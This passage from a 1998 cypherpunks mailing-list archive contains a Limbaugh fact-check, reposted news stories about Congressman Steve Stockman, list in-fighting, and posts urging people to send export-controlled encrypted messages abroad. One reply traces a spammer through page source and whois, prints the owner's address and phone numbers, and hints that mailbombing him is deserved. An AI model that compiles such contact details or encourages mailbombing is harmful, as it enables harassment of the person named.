scurry across the border to get it done right: the American way. They have
found, through
experience, that state medical care is too expensive..." (Told You So, p. 153)

REALITY: "Mr. Limbaugh's claim simply isn't true," says Dr. Hugh Scully, chair
of the
Canadian Medical Association's Council on Healing & Finance. "The vast
majority of Canadians,
including physicians, receive their care here in Canada. Those few Canadians
who receive health
care in the U.S. most often do because they have winter homes in the
States--like Arizona and
Florida -- and have emergent health problems there." Medical care in Canada is
hardly "too
expensive"; it's provided free and covered by taxes.


LIMBAUGH: "There are more American Indians alive today than there were when
Columbus
arrived or at any other time in history. Does this sound like a record of
genocide?" (Told You So,
p. 68)

REALITY: According to Carl Shaw of the U.S. Bureau of Indian Affairs,
estimates of the
pre-Columbus population of what later became the United States range from 5
million to 15
million. Native populations in the late 19th century fell to 250,000, due in
part to genocidal
policies. Today the U.S.'s Native American population is about 2 million.


LIMBAUGH: "Women were doing quite well in this country before feminism came
along."
(Radio show, quoted in FRQ, Summer/93)

REALITY: Before feminism, women couldn't even vote. 


LIMBAUGH: "Anita Hill followed Clarence Thomas everywhere. Wherever he went,
she wanted
to be right by his side, she wanted to work with him, she wanted to continue
to date him.... There
were no other accusers who came forth after Anita Hill did and said, 'Yeah,
Clarence Thomas, he
harassed me, too.' There was none of that." (TV show, 5/4/94)

REALITY: Hill could not have continued to date Thomas, since they never dated.
Two other
women, Sukari Hardnett and Angela Wright, came forth in the Thomas case with
similar charges. 


LIMBAUGH: On Whitewater: "I don't think the New York Times has run a story on
this yet. I
mean, we haven't done a thorough search, but I--there has not been a big one,
front-page story,
about this one that we can recall. So this has yet to create or get up to its
full speed--if it weren't
for us and the Wall Street Journal and the American Spectator, this would be
one of the biggest
and most well kept secrets going on in American politics today." (TV show,
2/17/94)

REALITY: The New York Times BROKE the Whitewater story on March 8, 1992, in a
front-page story by Jeff Gerth that included much of the key information known
today. The
investigative article ran over 1700 words.


LIMBAUGH: Quotes President James Madison: "We have staked the future...upon
the capacity
of each and all of us to govern ourselves, to control ourselves, to sustain
ourselves according to
the Ten Commandments of God." (Told You So, p. 73)

REALITY: "We didn't find anything in our files remotely like the sentiment
expressed in the
extract you sent to us," David B. Mattern, the associate editor of The Madison
Papers, told the
Kansas City Star (1/16/94). "In addition, the idea is entirely inconsistent
with everything we know
about Madison's views on religion and government." 


LIMBAUGH: "And it was only 4,000 votes that--had they gone another way in
Chicago--Richard
Nixon would have been elected in 1960." (TV show, 4/28/94)

REALITY: Kennedy won the 1960 election with 303 electoral votes to 219 for
Nixon. Without
Illinois' 27 electoral votes, Kennedy would still have won, 276-246.


LIMBAUGH: On Iran-contra special prosecutor Lawrence Walsh: "This Walsh story
basically
is, we just spent seven years and $40 million looking for any criminal
activity on the part of
anybody in the Reagan administration, and guess what? We couldn't find any.
These guys didn't
do anything, but we wish they had so that we could nail them. So instead,
we're just going to say,
'Gosh, these are rotten guys.' They have absolutely no evidence. There is not
one indictment.
There is not one charge." (TV show, 1/19/94)

REALITY: Walsh won indictments against 14 people in connection with the Iran-
contra scandal
including leading Reagan administration officials like former Secretary of
Defense Caspar
Weinberger and former national security advisers Robert McFarlane and John
Poindexter. Of
the 14, 11 were convicted or pleaded guilty. (Two convictions were later
overturned on
technicalities--including that of occasional Limbaugh substitute Oliver North)


LIMBAUGH: Explaining why the Democrats wanted to "sabotage" President Bush
with the 1990
budget deal: "Now, here is my point. In 1990, George Bush was president and
was enjoying a 90
percent plus approval rating on the strength of our victories in the Persian
Gulf War and Cold
War." (Told You So, p. 304)

REALITY: In October 1990, when the budget deal was concluded the Gulf War had
not yet been
fought.


LIMBAUGH: On the Gulf War: "Everybody in the world was aligned with the United
States
except who? The United States Congress." (TV show, 4/18/94)

REALITY: Both houses of Congress voted to authorize the U.S. to use force
against Iraq.


LIMBAUGH: On Bosnia: "For the first time in military history, U.S. military
personnel are not
under the command of United States generals." (TV show, 4/18/94)

REALITY: That's news to the Pentagon. "How far back do you want to go?" asked
Commander
Joe Gradisher, a Pentagon spokesperson. "Americans served under Lafayette in
the
Revolutionary war." Gradisher pointed out several famous foreign commanders of
U.S. troops,
including France's Marshall Foch, in overall command of U.S. troops in World
War 1. In World
War 2, Britain's General Montgomery led U.S. troops in Europe and North
Africa, while another
British General, Lord Mountbatten, commanded the China-Burma-India theatre.


LIMBAUGH: Limbaugh frequently denies that he uses his show for political
activism: "I have
yet to encourage you people or urge you to call anybody. I don't do it. They
think I'm the one
doing it. That's fine. You don't need to be told when to call. They think you
are a bunch of
lemmings out there." (Radio show, 6/28/93)

REALITY: Just an hour after making the above claim, he was--as usual--sending
his troops to the
trenches: "The people in the states where these Democratic senators are up for
reelection in '94
have to let their feelings be known.... These senators, you let them know. I
think Wisconsin's one
state. Let's say Herb Kohl is up in '94. You people in Wisconsin who don't
like this bill, who don't
like the tax increases, you let Herb Kohl know somehow."


And in summation, Rush is a liar (proven by (4:1:b), 'Merriam Webster's
Collegiate Dictionary,
10th Edition", page 670-671)!

Readers should judge on their own, whether you think this proves that Rush
knew about these
lies in advance and/or had an intent to deceive when he told these lies (as
it's impossible to prove
ones state of mind). I believe he did (on both accounts), so therefore I
believe there's ample
evidence to show Rush a liar by subsense 4:1:a, and 4:2 also! Readers should
also judge whether
they think that (many of) his lies are attempts at changing history.

Stanley Rosenthal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Sat, 14 Mar 1998 22:21:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: And ANOTHER REAL "Punk!" (or two)
Message-ID: <169bc590.350b7340@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Subj: TAKE STOCK(man, Please!)!
Date: 06/19/96

I start with Article 6, section 3 of the Constitution of the United States of
America - 

"3 The Senators and Representatives before mentioned, and the members of the
several State Legislatures, and all executive and judicial officers,
both of the United States and of the several States, shall be bound by oath or
affirmation, to support this Constitution; but no religious test shall
ever be required as a qualification to any office or public trust under the
United States."

And now, from the *real* "liberal" media, the Houston Press, June - 13-19 -
1996 issue -
--------------------------
(TOC description - Stalking Stockman - Truth was the first casualty when I
visited Steve Stockman's combined home and political sweatshop. By Tim
Fleck)

{Quote - "We're not afraid of anything." - An unidentified whiny-voiced
Stockmanite. Photos - a picture of the headline of an article in the Houston
Chronicle of 6-7-96 - "CHARGES SOUGHT AGAINST REPORTER Trespassing Alleged At
Stockman's House", a picture of Tim Fleck walking up
to Stockman's house, caption - "Knock, knock, who's there? Fleck cautiously
approaches the threshhold of the Stockman compound.", and a picture
of a sign that says "God Bless You! Congressman Stockman")


INTO THE DEN OF STOCKMANIA

The Truth About My Alleged "Invasion" Of The Friendswood Congressman's One-
Stop Political Sweatshop And Homestead

By Tim Fleck

For just a moment, it seemed as if there might be at least one good man
laboring at Congressman Steve Stockman's political
sweatshop-cum-residence when I dropped in last week for an unannounced visit.
Several raps on the front door had summoned a lanky young
African-American volunteer named Booker T. Stallworth. Despite being
confronted by a stranger with a press I.D. card clipped to his shirt pocket
and a bulky Sony tape recorder and microphone slung over his shoulder,
Stallworth flashed an all-American smile and graciously motioned me in.
Judging by the fallout generated by those two or three steps forward, I might
just as well have landed on the front lawn of Stockman's Friendswood
home in a black helicopter.

Once inside, my rather limited tour of the Stockman compound lasted about two
minutes before I was ordered out by an officious young Stockmanite
who refused to identify himself and displayed a distinct aversion to cameras.
No physical contact, shouting or foul language occurred during the brief
encounter. Yet within two hours of my visit, Stockman's Capitol Hill office
began spewing press releases at taxpayers' expense that accused me of
trespassing and forcing my way into the congressman's residence and physically
assaulting his campaign workers.

"This is outrageous!" Stockman was quoted as huffing in one "updated" release
(headlined "Stockman Stalked by Trespassing Reporter"). "I have
called the Harris County Sheriff's Department, the Capitol Hill police and the
[U.S. House] Sergeant-at-Arms' office. I am pressing charges for
trespass and assault and battery."

Stockman's office even suggested that I had terrorized the congressman's wife,
Patti Bullock Stockman, assuring the world that she "was unharmed"
after my visit. That insinuation was especially outlandish, given that I never
laid eyes on Patti Stockman (who, incidentally, has a $58,000-a-year job
at the Johnson Space Center that presumably would have required her presence
on that weekday afternoon).

Stockman himself hastily caught a plane back from D.C. "to address the
emergency," according to his congressional flack Cory Birenbaum, and
while in flight called a talk-radio station in Beaumont to beat the drums
about the alleged home invasion. Birenbaum told another reporter that
Stockman already had complained to Friendswood police, one of whom, the
spokesman related, declared that he "would have shot the son of a bitch
dead." But the chief of the Friendswood force told another local reporter that
his department hadn't heard from Stockman.

The Stockman press releases alerted area media outlets, whose reporters were
soon sorting through the lies produced by the Stockman propaganda
machine and writing their own stories about the incident. Birenbaum tried to
peddle one whopper that I had crashed the Stockman-Newt Gingrich
rally at a Galleria-area (StanNote! outside of Stockman's district) hotel last
month by falsely claiming to be a reporter with the Associated Press. The
only problem with that was that the A.P. reporter and I had both bantered with
Birenbaum at the event, and clearly identified ourselves to him. I had
received a press credential to the rally after displaying my Houston police
press I.D., which bears the name *Houston Press* in large, hard-to-miss
letters.

The lies continued later, when volunteer Stallworth filed a complaint with the
Harris County Sheriff's Department falsely claiming that I had pushed
him and shouted and screamed during my visit. (The recording I made of the
incident shows the conversation never broke a sonic sweat.) The
sheriff's department punted the complaint to the district attorney's office,
where Johnny Holmes' top assistant, Don Sticklin, was investigating at
press time.

In retrospect, Stallworth's dissembling probably explains what a seemingly
nice guy like him was doing hanging with the Stockman gang. By inviting
me into Stockman's political nest, though, Stallworth did prove that he hadn't
absorbed a central tenet of the political consulting business.

Photographer Nicole Fruge' and I drove to Friendswood to do some on-the-scene
investigation of Political Won Stop, a business registered in
Brazoria County that operates out of Stockman's residence and has received
$126,000 in payments from the congressman's campaign since January.
One of the listed principals of the firm, Chris Cupit, just happens to be the
Republican nominee for tax assessor-collector of Jefferson County, a
position that has been vacated by Democrat Nick Lampson, who is now running
for Congress against Stockman.

Cupit apparently has no official campaign office of his own in Jefferson
County, raising questions about whether resources from his and Stockman's
campaigns are being comingled in the rather cozy spaces of the Whitman Way
residence. That would be a violation of federal election law. And *The
Hill*, a D.C. based weekly that covers Congress and first reported on the
Political Won Stop operation, has questioned whether Stockman's
campaign keeps the appropriately legal "arms-length" distance from the
consultants, whose phone number is the same as Stockman's and who
presumably use the facilities available to others in the Stockman household.

*Press* calls to the house and Cupit and partner Jason Posey (who had
identified himself as a Stockman "volunteer" to *The Hill*) went unreturned,
so the only option seemed to be an on-site inspection. After I followed
Stallworth into the living room of the Stockman domicile, I met several
volunteers who claimed Cupit was not there. But the 1995 Saturn that was
reposing in Stockman's driveway at the time is registered to Cupit. The
front of the intensely claustrophobic house, where windows might otherwise be
found, is sealed by planking, and the only vista to the street is a
pinhole in the worn wooden front door. It hardly seems a residence fitting for
a U.S. congressman, even one whose employment history prior to his
1994 election was rather spotty.

The living room, cluttered with campaign signs and literature, opens on the
right into a garage office, where Political Won Stop apparently does its
work. A hallway on the left presumably leads to some sort of sleeping
quarters, where Patti may or may not have been crouching in fear while I was
in the front room.

Upon my entry, Stallworth summoned a dark-haired young man from the garage
office, who proved far less friendly. "You'll have to leave," he
announced in a rather whiny, nasal voice. (The following day, the *Press*
called Chris Cupit at his home in Groves and discovered that he possess a
whiny, nasal voice identical to that of the man who ordered me out of
Stockman's residence. But perhaps everybody who works for Stevie whines. On
the phone, Cupit flatly denied being present at Stockman's house during my
visit. Before we could ask what his car was doing in Stockman's
Driveway, Dupit said he had to go but promised to call us back shortly. He
never did, of course.)

At the Stockman compound, the Cupit sound-alike denied that Political Won Stop
operated out of the house, but tried to change the subject when I
reminded him that Stockman's own campaign finance filings list the company as
based there. "I know, but we have rights, too, and you've got to
honor our rights," he whined. He seemed especially terrified that photographer
Fruge', who was just outside the front door with her camera, might get
a shot of his face. He tried to close the front door, and another volunteer
then slammed it shut and pressed his back against it, barring any exit. I
asked the head whiner what he was so afraid of. "We're not afraid of
anything," he insisted, rather unconvincingly.

After being ordered once more to leave, I replied, Well, fine, open the door.
And don't hide too much. You guys are pathetic." And with that, my
alleged "invasion" of the congressman's castle was over. Minutes later,
several young Stockman volunteers drove up, and I asked them to locate
Chris Cupit for me. Once inside the house, they didn't come back out before
Fruge' and I departed.

Fruge' took a few more shots of Fort Stockman from the street while I went to
interview neighbors. Birenbaum would later claim she took photos
through the windows of the Stockman abode. The problem with that particular
lie is that there are no windows accessible from the front yard to take
photos through.

A woman who lives next door to Stockman seemed surprised to learn that the
bustling political office also housed a U.S. Congresseman and his wife.
"No, I do not know him," said Hanan Zadeh, when asked if she had had the
pleasure of meeting Steve Stockman.

Zadeh - who, unlike the boys next door, did not hesitate to identify herself -
seemed unperturbed by the continuous stream of people coursing in and
out of Stockman's alleged residence.

"We know this is just temporary for election time," she explained. "It's not a
problem."

But depending on how the money paid by Stockman to Political Won Stop is
actually used, it could be a big problem for the Freshman Prince of
Friendswood in the not-so-distant future.
--------------
"We're not afraid of anything."

They certainly aren't afraid of *god*!

Stan
============
Subj: It's Cupit, Ma'am, Not Stupid!
Date: 07/21/96

More from the "Liberal Media", from the 'Houston Press' June 20-26, 1996
these are pieces of -
---------------------
The Insider - compiled by Tim Fleck

TALES OF CUPIT (RHYMES WITH STUPID)

The squirrelly adventures of Congressman Steve Stockman's frat-house band of
consultants who call themselves Political Won Stop seem to know no
limits. *The Hill*, a Congress-covering weekly in the nation's capital, first
revealed that Stockman's re-election campaign had paid more than
$126,000 to the consultancy, which is owned by 26-year-old Chris Cupit and
25-year old Jason Posey and is listed on the congressman's campaign
disclosures as having the same Whitman Way address as stockman's combination
home and election headquarters just outside Friendswood. More
recently, *The Hill* reproted that the address Political Won Stop used on its
DBA filing in Brazoria County is a rental beach house at Surfside.
Always up for a summer jaunt to the Gulf, The Insider motored down to Surfside
over the weekend to discover that the rent house, which is named
the Hide-a-Way and sits just down the road from the Money Pit, was vacent. On
our return, we talked to the owner of the Hide-a-Way, Houstonian
Diane Hensley, who rented the house in the off-season to Cupit from last fall
to early spring. Hensley, a Stockman supporter and unsuccessful
legislative candidate this year, says she's known Cupit for two years and
isn't surprised he listed the home as his place of business.

The Hide-a-Way certainly is an appropriately named location for a business run
by the secrecy-obsessed Cupit, the Stockman operative and GOP
nominee for Jefferson County tax collector-assessor whom we encountered on our
unannounced visit to Stockman's home/campaign office two weeks
ago. Cupit refused to identify himself and hid his face when a *Press*
photographer approached. It's apparently typical behavior from Cupit, judging
by the account of an advertising sales type who tried to sell the Stockman
campaign some bumper stickers two days before we ventured into the grip
of Stockmania.

The salesman says he contacted the Stockman headquarters "and got ahold of a
man who wouldn't identify himself except by his first name, Chris."
It took the salesman two weeks to get an appointment with the mysterious
Chris, and only under circumstances that seem lifted from a spy novel.
"He would not give me the address of his headquarters," recounts the salesman,
"and he asked if I would meet him on the parking lot of the Burger
King in Baybrook Mall." (Stockman's home/office is located in a subdivision
behind the mall.) When the salesman finally rendezvoused with "Chris,"
the Stockman flunky again refused to give his last name but expressed interest
in the batch of see-through, peel-off "Stockman for Congress"
stickers the salesman had brought along to demonstrate. Chris refused to allow
the salesman to put one of the stickers on his car and instead insisted
they be handed over for future inspection, presumably by the congressman. At
one point, Chris displayed a trace of envy by allowing that he wished
he could afford the see-through numbers for his own campaign.

The salesman is still chuckling over the encounter. "I'm in my early
seventies, and I've done business in Houston for over 35 years. It's the first
time
I ever made a sales pitch on the parking lot of a Burger King!" (He was later
shown a photo of Chris Cupit and positively identified the stealth
candidate as the phantom of the Burger King.) Their meeting was two weeks ago,
and now the salesman can't get through to Chris. "The guy who
answers the phone, who's a nitwit, says, 'What is this regarding?' Then he
says, 'I don't know if he's here.' I say, 'Come on, kid, you're in a house and
you don't know who comes through the front door?' "

Cupit also hasn't acquired much name identification in Beaumont, the seat of
the county where he wants to be the head tax collector. When The
Insider went on a Beaumont call-in show last week to debunk the false claims
by Stockman that we had assaulted his campaign workers and
terrorized his wife, the radio host, Jack Piper, was unfamiliar with Cupit and
his candidacy. During Piper's show, we played an audio tape of our
encounter with the Stockmanites at the congressman's home, wheich included our
repeated question, "Is Chris Cupit here?" Afterward, a
hard-of-hearing pro-Stockman caller rang up to chastise the liberal media for
"calling people stupid." Why, she asked, did we have to call them
stupid? Piper had to gently correct her: "It's Cupit, ma'am, not stupid."


==========
Subj: Fleck Gets an 'E' (of the 'RWLTPC') (one whos job it is to destroy
anyone or anything that goes against the 'RWLTPC') !
-----
>From the Houston Press, July 4-10 issue, Letters section -
-----
The Stockman Welcome Mat

Having read the latest in your series of articles and "exposes" on Congressman
Steve Stockman, I have a few questions and observations for you:
Do you expect Stockman or his staff to welcome you into his home with open
arms when everything you've ever written about him has been decidedly
negative? Your stories and the tone of your paper are antything but objective.
You can't abide or report objectively on anything or anyone who is
Republican, nor can you ever report anything unfavorable on a Democrat.

You went to Stockman's place with your mind made up as to what you were going
to write. You refer to all his staffers as whiny. To me, you are the
ultimate whiner.

Jerry King
Houston
==========
Subj: More 'Take Stock(man), PLEASE!'

>From the Houston Chronicle, 7-21-96 -
------
STOCKMAN MOURNS DEATH OF 'SUPPORTER'

Alan Bernstein, Politics

U.S. Rep. Steve Stockman of Friendswood did not immediately try to put a self-
serving political spin on last week's TWA jetliner tragedy.

He waited almost two days.

On Friday afternoon, reporters received a news release on Stockman's
congressional stationery. It expresses the congressman's deep sorrow that
Houston victim's rights advocate Pam Lychner was killed in the explosion and
crash off Long Island.

The document, an official communication from Stockman's publicly funded
operation in Washington, D.C., was headlined "STOCKMAN
SUPPORTER DIES IN TWA TRAGEDY/ VICTIMS' ADVOCATE MADE TV AD FOR STOCKMAN."

With direct quotes from Stockman, the news release lauded Lychner for her
criminal justice reform work.

"Pam was a friend who will be dearly missed by my wife Patti and I," said
Stockman's written words. "Pam Lychner did a campaign television ad for
me in 1992. I got to know her and her story. She was a woman of uncommon
courage and inner strength and that is how I will remember her."

Stockman's top aide, Cory Birenbaum, said the news release was not a political
exploitation of a grim event.

"We are just trying to point things out that affect" the congressman,
Birenbaum explained. "It's simply to regret the fact that a personal friend of
his
passed away."

To say the least, written statements from Stockman and Birenbaum have been
controversial lately.

In June, another official news release from Stockman carried the headline
"STOCKMAN STALKED BY TRESPASSING REPORTER."

It told Stockman's version of a visit to his home and campaign headquarters in
Friendswood by a reporter for the Houston Press, at a time when
Stockman was in Washington.

Stockman sought criminal charges against the reporter. The district attorney's
office refused to file the charges. The reporter then filed a libel suit
against Stockman.

Birenbaum was the focus of national publicity recently for a private letter he
wrote to a Texas Monthly reporter after the magazine ran an
unflattering profile of Stockman.

The letter said the writer got her magazine job "for reasons I would refuse to
speculate upon in polite society. Hope your knees have healed up
nicely."

Birenbaum said he meant that the writer had to beg for employment, not that
she performed a sex act. ... 


                                                                           




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Sun, 15 Mar 1998 02:15:20 -0800 (PST)
To: "Jared" <cutey-jared@mailcity.com>
Subject: For Your Entertainment (Was: Re: New Website is up!!)
In-Reply-To: <AMCMHFHNEKAABAAA@mailcity.com>
Message-ID: <199803151008.FAA09540@users.invweb.net>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3990.1071713782.multipart/signed"

--Boundary..3990.1071713782.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit


In <AMCMHFHNEKAABAAA@mailcity.com>, on 03/14/98 
   at 12:17 PM, "Jared" <cutey-jared@mailcity.com> said:

>New Web page up at HTTP://WWW.INSTANTWEB.COM/~SALEM/

>CHECK IT OUT!! 

The below is for your entertainment only!! I am not responsible for any
mailbombs, plug pulling, or much worse faits that all spamers truly
deserve. <eg>

Well after doing a little investigation I was able to track down our
"friend" here

After looking at the source code at the url above I found:

src="http://www.geocities.com/Area51/Corridor/1037/hacker.gif"

After looking at the source code at this URL:

http://www.geocities.com/Area51/Corridor/1037

<META NAME="description" CONTENT="This is the home page of jalawohs real
alien pictures and true story.">

and

mailto:montanajack@hotmail.com

and

<A HREF="http://www.jalawoh.com/">

which brings us to Jalawoh Studios:

Ph: 1-619-588-1716 
Fax: 1-619-590-2493 
Mailing Address:  
Jalawoh Studios,
676 Grape St.,
El Cajon, Ca.
92021-5813

a division of Internet, Inc. (a delaware corporation)

Non-authoritative answer:
Name:    www.jalawoh.com
Address:  209.41.45.82


[rs.internic.net]
Jalawoh Studios (JALAWOH-DOM)
   676 Grape St
   El Cajon, Ca 92021
   US

   Domain Name: JALAWOH.COM

   Administrative Contact:
      Antonio, Manuel  (MA3191)  jalawoh@10MB.COM
      (619)590-2493
   Technical Contact, Zone Contact:
      Hostmaster, Rapidsite Inc  (HRI-ORG)  hostmaster@RAPIDSITE.NET
      561-994-6684
Fax- 561-994-6617
   Billing Contact:
      Antonio, Manuel  (MA3191)  jalawoh@10MB.COM
      (619)590-2493

   Record last updated on 25-Aug-97.
   Record created on 25-Aug-97.
   Database last updated on 14-Mar-98 04:13:01 EST.

   Domain servers in listed order:

   NS.NAMESERVERS.NET		207.158.192.61
   NS2.NAMESERVERS.NET		207.158.192.91



-- 
---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/esecure.html                        
---------------------------------------------------------------
Title:  FBI's Ten Most Wanted Fugitives 











FBI's TOP 10 WANTED LIST









<img

        src="http://www.geocities.com/Area51/Corridor/1037/hacker.gif" alt="Tattooman" border="4" width="90"

        height="120"> 

        Tattooman 






<img

        src="http://www.geocities.com/Area51/Corridor/1037/hacker.gif" alt="Conjuror" border="4" width="90"

        height="120"> 

        Conjuror !-->



<img

        src="http://www.geocities.com/Area51/Corridor/1037/hacker.gif" alt="|Oracle|"

        border="4" width="90" height="120"> 

        |Oracle|

        

        

         



<img

        src="http://www.geocities.com/Area51/Corridor/1037/hacker.gif" alt="RSnake" border="4"

        width="90" height="120"> 

        Rsnake

 



<img src="http://www.geocities.com/Area51/Corridor/1037/hacker.gif"

        alt="Mantis" border="4" width="90"

        height="120"> 

        Mantis

         















<img src="http://www.geocities.com/Area51/Corridor/1037/hacker.gif"

        alt="Photon Rain" border="4" width="90"

        height="120"> 

        Photon Rain

         





        <img src="http://www.fbi.gov/mostwant/wantfug.jpg"

        alt="FBI's Ten Most Wanted 

Fugitives" border="0"> 



<img

        src="http://www.geocities.com/Area51/Corridor/1037/hacker.gif" alt="Spikeman" border="4"

        width="90" height="120"> 

        Spikeman 

         















<img

        src="http://www.geocities.com/Area51/Corridor/1037/hacker.gif" alt="Transmitt" border="4" width="90"

        height="120"> 

        Transmitt 





<img

        src="http://www.geocities.com/Area51/Corridor/1037/hacker.gif" alt="Snake Plisken" border="4"

        width="90" height="120"> 

        Snake Plisken

         



 <img

        src="http://www.geocities.com/Area51/Corridor/1037/hacker.gif" alt="Anon"

        border="4" width="90" height="120"> 

        Anon

         

                     



<img

        src="http://www.geocities.com/Area51/Corridor/1037/hacker.gif" alt="Sgt Rock" border="4"

        width="90" height="120"> 

        Sgt Rock

         

         

        











The FBI

is offering rewards for information leading to the apprehension

of Ten Most Wanted Fugitives. Check each fugitive page for the

specific amount.









Freedom Knights - 

El Fuckero -

FBI Whores - 

Technotronic's Place

Copyright '98 IVAll rights ReservedHacking, Inc.




The page





Title: real aliens roswell new mexico 1947




















Saucer Crash, Roswell 1947














Note the Aliens around the craft
and the N.M. State Trooper  in the background, upper right corner.



 The Story
 

 Zeta Reticula

The untold story of what really happened 50 years ago in Roswell New Mexico 1947.



(c) j a l a w o h . s t u d i o s
all rights reserved 1997

 Autopsy Report



 Control Panel



 Area51 Tours



 Our Statistics



 Anti Gravity



 Free Aliens



 Read E-mail



 Add URL 






Note: ...this page designed to be viewed in as low as 640X480 video resolution...in recognition of the many older machines globally still in use...
Zetan 3000i:
Phaser Processor
12 Terra byte Ram
Hyper Light Modem
Infinity Hard Drive
 !! coming soon !!


make contact





                 <a href="http://ad.linkexchange.com/X110310/gotoad.map" 
                 target="_top">
                 <img width=440 height=40 border=1 ismap 
                 alt="Internet Link Exchange"
                 src="http://ad.linkexchange.com/X110310/logoshowad?free">
                 

                 
                 
                 Member of the Internet Link Exchange
                 
                 Free Home Pages at GeoCities
                 
                     




<IMG HEIGHT=34 WIDTH=93 SRC="http://cypherpunks.venona.com/date/1998/03/sdlink.gif"
ALT="SD Link Member" BORDER=0>



                      
                      This page hosted by 
                      <img src="http://cypherpunks.venona.com/pictures/gc_icon.gif" border=0
                      align=middle> 
                      Get your own Free Home Page
 





















 
Tag-O-Matic: Dogs crawl under gates, software crawls under Windows!


--Boundary..3990.1071713782.multipart/signed
Content-Type: application/octet-stream; name="pgp00002.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00002.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgTUVTU0FHRS0tLS0tClZlcnNpb246IDIuNi4zYS1z
aGExCkNvbW1lbnQ6IFJlZ2lzdGVyZWRfVXNlcl9FLVNlY3VyZV92MS4xYjFf
RVMwMDAwMDAKCmlRQ1ZBd1VBTlF1YkRvOUNvMW4rYUxoaEFRSFlld1FBbU1K
TW5uM2dYcWduR01VQ1BndGlPd1VueG96eVJuVkkKWXBkaE9QWFdzUW5NVGxT
NlVjVXMyYldyNXFCT3RmbHRsR0JKbzdYTHZnSGNpc0JRNW56bjZad0syUDVk
NzhRNAo2U0hpV296dSt3VGlJemxXbWMzZ0gySE9sMG5tMkNLNUlvd2tMeGc3
YStSbVJUYlliZUJwR0didTZWdytMQ3czCndZVWN1NHl1S0tRPQo9ZllyLwot
LS0tLUVORCBQR1AgTUVTU0FHRS0tLS0t
--Boundary..3990.1071713782.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 14 Mar 1998 19:38:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: A little Paranoid, PUNKS?
Message-ID: <199803150338.EAA10482@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


StanSquncr wrote:
> Subject: A little Paranoid, PUNKS?

Dimitri? Is that you, Dimitri?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 14 Mar 1998 19:39:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: (no subject)
Message-ID: <199803150339.EAA10507@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Information Security wrote:
>    >   > Guy --
>    >   > First you and Vulis flame each others, and then
>    >   > you start claiming that VZNuri's postings are really Vulis,
>    >   > and now you're claiming that postings from Toto's machines
>    >   > are really Vulis.  Perhaps *you're* really Vulis?
>    >
>    >     Bill Frantz is *really* Vulis.
>    >     Bill Stewart is *really* Toto.
> 
> What are you trying to say?
> 
> A point in every direction is like a point in no direction at all?

Sometime ago there was a post to the list which made more sense than
all of the other finger-pointing posts, combined, which have proclaimed
this-or-that entity to be a tentacle/testicle of one or another of the
list members.
The post was by someone claiming to be the "only" real member of the
cypherpunks list. It told how he had, being a lonely loser whom no one
would communicate with, started the cypherpunks mailing list and posted
to it under several personas, hoping to generate interest and have other
people join the list. It seems that his efforts began to escalate and
take on a life of their own, and he eventually had developed all of the
personas that currently existed on the list, and that no one else had
ever actually joined the list, at all.

"In reality, we talk only to ourselves, but sometimes we talk loud
 enough that others may hear us."
        Kahil Gibran, The Prophet

2-2





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 14 Mar 1998 19:55:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: In Your EAR...
Message-ID: <199803150355.EAA12419@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Other possible destinations can be found at:
http://cgibin.erols.com/ivsw/presspg1.htm

StarShip CowBoy wrote:
>   Suggestions for final destinations for your illegal and
> prosecutable communication:
> ~To yourself, at both U.S. and foreign email server sites.
> ~To your immediate family members at U.S. and foreign email
>   server sites.
> ~To foreign embassies of U.S. allies.
> ~To foreign embassies of U.S. enemies.
> ~To U.S. embassies in foreign countries.
> ~To foreign government email addresses, with instructions
>   for delivery to individuals presently incarcerated for
>   terrorist crimes.
> ~To anywhere you damn well please...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 14 Mar 1998 19:58:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: In Your EAR...
Message-ID: <199803150358.EAA12782@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Six wrote:
> 
>   Suggestions for final destinations for your illegal and
> prosecutable communication:


Full list at: http://www.bxa.doc.gov/Text/1_denial.txt


                           U.S. DEPARTMENT OF COMMERCE
                         BUREAU OF EXPORT ADMINISTRATION
                   Table of Denial Orders Currently in Effect

                           (Revised March 6, 1998) 

TABLE OF DENIAL ORDERS CURRENTLY IN EFFECT

(a) Contents

This table lists orders that currently deny export privileges in
whole or in part.  Orders are published in full in the Federal Register
as
cited in the column entitled, "Federal Register Citation."

(2) Publication of orders.  New or amended denial orders are published
in the
Federal Register as they are issued, and their issuance announced in
Export
Administration Bulletins.  Although  diligent efforts have been made to
ensure
the accuracy of the information in this table, the Federal Register is
the
authoritative source for denial orders.  

(3) Table: This table is updated as new orders are promulgated and
existing
orders expire.  The table does not appear in the Code of Federal
Regulations. 
Paper copies of this table are available from:

Office of Export Services
P.O. Box 273
Washington, D.C. 20044

(b) Effect of Denial Orders

Section 787.12 of the Export Administration Regulations (15 CFR 787.12)
makes
it unlawful, without prior specific authorization from Export
Administration,
for any person to:

(1) Apply for, obtain, or use any license, Shipper's Export Declaration,
bill
